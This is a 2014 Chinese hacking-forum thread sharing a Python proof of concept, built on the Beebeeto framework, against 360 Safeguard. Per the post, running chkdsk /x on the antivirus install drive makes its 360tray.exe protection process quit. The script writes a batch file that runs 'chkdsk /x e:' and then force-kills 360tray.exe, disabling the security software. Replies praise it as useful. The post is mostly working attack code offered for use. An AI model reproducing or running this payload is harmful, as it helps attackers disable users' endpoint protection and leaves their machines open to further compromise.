查看: 13053|回复: 6

360安全卫士chkdsk taskkill主进程 POC

[复制链接]
发表于 2014-11-25 19:20:35 | 显示全部楼层 |阅读模式
Author:        雷蜂

测试使用Windows XP SP3,VMware Workstation 10.0.3。
经测试,如果360安全卫士(其实不止360一家)安装在非系统盘(360自身默认安装在非系统盘),
然后对其所在盘符进行chkdsk /x 操作,其主防进程360tray.exe会自动强行退出,从而完全失去保护能力。

[AppleScript] 纯文本查看 复制代码
#!/usr/bin/env python
# coding=utf-8

"""
Site: [url]http://www.beebeeto.com/[/url]
Framework: [url]http://github.com/ff0000team/Beebeeto-framework[/url]
"""


from baseframe import BaseFrame


class MyPoc(BaseFrame):
    poc_info = {
        # poc相关信息
        'poc': {
            'id': 'poc-2014-0152',
            'name': '360安全卫士安装非默认路径 chkdsk taskkill主进程 POC',
            'author': '雷蜂',
            'create_date': '2014-11-19',
        },
        # 协议相关信息
        'protocol': {
            'name': 'local',
            'port': [0],
            'layer3_protocol': [],
        },
        # 漏洞相关信息
        'vul': {
            'app_name': '360',
            'vul_version': ['*'],
            'type': 'Other',
            'tag': ['本地提权', '杀掉360主进程', 'chkdsk taskkill', '360漏洞'],
            'desc': '''
                    Wooyun Author zhuixing:
                    测试使用Windows XP SP3,VMware Workstation 10.0.3。
                    经测试,如果360安全卫士(其实不止360一家)安装在非系统盘(360自身默认安装在非系统盘),
                    然后对其所在盘符进行chkdsk /x 操作,其主防进程360tray.exe会自动强行退出,从而完全失去保护能力。

                    ''',
            'references': ['http://wooyun.org/bugs/wooyun-2014-078641',
            ],
        },
    }


    @classmethod
    def verify(cls, args):
        verify_url = args['options']['target']
        payload = '''
@echo off

chkdsk /x e:

taskkill /F /IM 360tray.exe /T
'''
        # write
        test_bat = open('./360-taskkill.bat', 'w')
        test_bat.write(payload)
        test_bat.close()
        args['success'] = True
        args['poc_ret']['vul_url'] = 'Generation ok, file: ./360-taskkill.bat'
        return args

    exploit = verify


if __name__ == '__main__':
    from pprint import pprint

    mp = MyPoc()
    pprint(mp.run())
  
回复

使用道具 举报

发表于 2014-11-25 20:13:53 | 显示全部楼层
沙发?
支持下
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2014-11-25 23:07:39 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2014-11-26 10:07:52 | 显示全部楼层
顶下        
回复 支持 反对

使用道具 举报

发表于 2014-11-26 10:17:42 | 显示全部楼层
感谢分享,非常好用
回复 支持 反对

使用道具 举报

发表于 2014-11-26 11:22:56 | 显示全部楼层
非常赞。。。
回复 支持 反对

使用道具 举报

发表于 2014-11-26 15:07:57 | 显示全部楼层
很好的作品啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-9 08:17 , Processed in 0.026107 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部